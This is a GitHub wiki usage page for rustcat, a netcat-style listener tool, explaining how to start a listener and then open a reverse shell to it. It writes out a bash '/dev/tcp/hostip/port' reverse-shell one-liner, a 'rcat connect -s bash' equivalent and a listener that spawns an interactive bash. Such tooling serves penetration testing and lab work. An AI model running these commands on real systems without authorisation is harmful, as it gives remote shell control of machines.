-
Notifications
You must be signed in to change notification settings - Fork 63
Basic Usage
Elliot edited this page Aug 15, 2022
·
10 revisions
rcat [SUBCOMMAND] [FLAGS] [OPTIONS]
First, lets start a tcp listener with command history. rcat listen -ib 55660.
Then we can start a reverse shell on the host machine, but first we will have to grab our local ip.
ip addr
Output:
1: wlp3s0: <stuff>
inet 192.168.1.150/24
For me, my local IP is 192.168.1.150
Now you may run one of these commands on the host machine, you can also use any other revshell.
Replace "hostip" with the local IP we got from the command above and set the "port" to anything between 1 - 65535. Tho some ports may already be in use.
>> /bin/bash -c 'bash -i >& /dev/tcp/hostip/port 0>&1'
Or with rustcat
>> rcat connect -s bash hostip port
Once you run that on the host machine, you should have a reverse shell with history.
Show the help
rcat --help
rcat listen 55660
rcat listen -ib 55660
Listen to port 55660 on localhost with command history & command completion and start a bash with interactive mode on connection recieved:
rcat listen -ie "/bin/bash -i" 55660
rcat listen -l 55660
rcat listen 192.168.1.10 55660
rcat connect -s bash 192.168.1.10 55660
There are aliases for the subcommand, so you only need to type out "c" or "l" instead of "connect" and "listen". Examples:
rcat l 55600
rcat c -s bash 55600